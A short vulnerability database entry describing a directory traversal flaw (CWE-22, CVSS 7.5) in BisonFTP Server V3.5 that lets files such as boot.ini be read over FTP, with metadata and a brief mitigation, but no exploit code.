Vendor: BisonFTP Server
By: Jay Turla
CVSS: 7.5 (HIGH)
Vulnerability Type: Directory Traversal
CWE: 22
Product Name: BisonFTP Server
Affected Version From: V3.5
Affected Version To: V3.5
Patch Exists: NO
Related CWE: N/A
CPE: a:bisonware:bisonftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Service Pack 3 - English
2020
BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (the published exploit is described as quick and dirty code just for PoC). An attacker can use the FTP protocol to traverse directories and retrieve files from the server, such as the boot.ini file.
Mitigation:
Ensure that the FTP server is configured to restrict access to only the necessary directories and files, and that it is configured to use secure, authenticated access such as SFTP or FTPS.